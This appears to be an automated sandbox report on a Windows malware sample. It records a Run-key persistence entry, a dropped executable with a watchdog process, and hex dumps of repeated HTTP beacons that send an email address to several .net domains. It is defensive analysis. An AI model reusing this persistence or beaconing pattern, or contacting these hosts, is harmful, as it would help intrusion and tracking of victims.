Analysis Date2015-05-12 23:09:43

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c463a7f3323f0b4e47094e4924cf8839 sha1: 2db0a4eb2106f4da1b6a234490703c15662b2e0b size: 297472
Section.rdata md5: b306e7828757e5c657d114812c82519d sha1: 5617e49561c2eeb42ee35918a190d6a959cdcc13 size: 33792 md5: 68aa2b9852a25de0f5050e169e5c089b sha1: 1f57c6dcff38501a2d3e11349d4f89e488822358 size: 89088
Timestamp2014-10-30 10:11:24
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IP User-mode Process TP SNMP AutoConfig HomeGroup ➝
C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe

↳ C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\ctmyhahnp\nxtrkzpnpuhu.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.rcfr
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\ctmyhahnp\zkirgau.exe"

Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2066 6c696572   ose..Host: flier
0x00000070 (00112)   6265666f 72652e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a206e 69676874   ose..Host: night
0x00000070 (00112)   73707269 6e672e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2063 61707461   ose..Host: capta
0x00000070 (00112)   696e7375 63636573 732e6e65 740d0a0d
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2065 6c656374   ose..Host: elect
0x00000070 (00112)   72696373 7072696e 672e6e65 740d0a0d
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2074 72616465   ose..Host: trade
0x00000070 (00112)   73707269 6e672e6e 65740d0a 0d0a0a0d
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 74726565   ose..Host: stree
0x00000070 (00112)   74737563 63657373 2e6e6574 0d0a0d0a
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2073 74726565   ose..Host: stree
0x00000070 (00112)   7462616e 6b65722e 6e65740d 0a0d0a0a
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2062 65747465   ose..Host: bette
0x00000070 (00112)   72737563 63657373 2e6e6574 0d0a0d0a
0x00000080 (00128)   0a                                    .

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d626761 7a7a6172 69406361   mail=bgazzari@ca
0x00000020 (00032)   72697072 61746f2e 6974266d 6574686f
0x00000030 (00048)   643d706f 7374266c 656e2048 5454502f   d=post&len HTTP/
0x00000040 (00064)   312e300d 0a416363 6570743a 202a2f2a   1.0..Accept: */*
0x00000050 (00080)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000060 (00096)   6f73650d 0a486f73 743a2071 75696574   ose..Host: quiet
0x00000070 (00112)   73756363 6573732e 6e65740d 0a0d0a0a
0x00000080 (00128)   0a                                    .

         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j h`JE
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
}[	_(r0
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
